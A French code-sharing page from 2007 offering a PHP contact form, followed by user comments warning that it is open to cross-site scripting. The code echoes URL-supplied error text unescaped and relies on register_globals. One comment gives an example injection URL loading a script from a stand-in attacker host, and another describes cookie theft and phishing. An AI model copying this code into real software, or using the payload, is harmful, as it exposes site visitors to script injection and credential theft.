5/5 (13 avis)
Vue 19 204 fois - Téléchargée 2 345 fois
Crée un fichier "formulaire.php" le code du formulaire est le suivants ( a insérer entre les balise <body> </body>: <div align="center"> <h1><font face="Verdana, Arial, Helvetica, sans-serif">Contactez-moi</font></h1> </div> <form action="result.php" method="post" name="form" id="form"> <table width="400" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"> <? if ($ERRMSG!=""): echo("<font color='Red'><B><I>$ERRMSG</I></B></font><BR><BR>\n"); endif; ?> </td> </tr> <tr> <td> </td> <td> </td> </tr> <tr> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Nom :</font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input name="Nom" type="text" id="Nom" size="25"> </font></td> </tr> <tr> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Prénom :</font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input name="Prenom" type="text" id="Prenom" size="25"> </font></td> </tr> <tr> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Adresse email :</font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input name="Email" type="text" id="Email" size="25"> </font></td> </tr> <tr> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> </font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> </font></td> </tr> <tr> <td valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> Commentaire :</font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="Commentaire" id="Commentaire"></textarea> </font></td> </tr> <tr> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> </font></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> </font></td> </tr> <tr> <td><div align="right"> <font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input type="reset" name="Submit2" value="Effacer"> </font></div></td> <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input type="submit" name="Submit" value="Envoyer"> </font></td> </tr> <tr> <td> </td> <td> </td> </tr> </table> </form> Crée un fichier "result.php" <? // on verifie deja les champs... $ERRMSG=""; if ($Nom==""): $ERRMSG.="<LI>Votre nom\n"; endif; if ($Email==""): $ERRMSG.="<LI>Votre email\n"; endif; // Champs à modifier selon les besoin if ($ERRMSG!=""): $ERRMSG="Vous devez indiquer...".$ERRMSG; $ERRMSG=urlencode($ERRMSG); $Nom=urlencode($Nom); $Email=urlencode($Email); Header("Location: formulaire.php?ERRMSG=$ERRMSG&Nom=$Nom&Email=$Email"); exit; endif; // donc on peut envoyer l email if ($EMAIL==""): endif; $mail = $mail."DEMANDE D'INFORMATION Photoagogo\n\n\nStatue : "; $mail = $mail."\nNom : " . $Nom; $mail=$mail."\nPrénom : " . $Prenom; $mail=$mail."\nEmail: " . $Email; $mail=$mail."\nCommentaire : " . $Commentaire; // Sujet du mail et adresse de déstination $recipient = "email@nomdomaine.com"; $subject = "Demande d'information Photoagogo"; // Sujet du mail $mailheaders = "From: Demande d'information venant de photoagogo.fr.St <> \n"; mail($recipient, $subject, $mail, $mailheaders); // Remerciement $ERRMSG="Nous avons bien pris en compte votre demande.<BR>A très bientôt !"; $ERRMSG=urlencode($ERRMSG); Header("Location: formulaire.php?ERRMSG=$ERRMSG"); ?>
26 juin 2007 à 21:40
26 juin 2007 à 19:30
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
26 juin 2007 à 16:35
26 juin 2007 à 02:10
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
25 juin 2007 à 23:36
Vous n'êtes pas encore membre ?
inscrivez-vous, c'est gratuit et ça prend moins d'une minute !
Les membres obtiennent plus de réponses que les utilisateurs anonymes.
Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.
Le fait d'être membre vous permet d'avoir des options supplémentaires.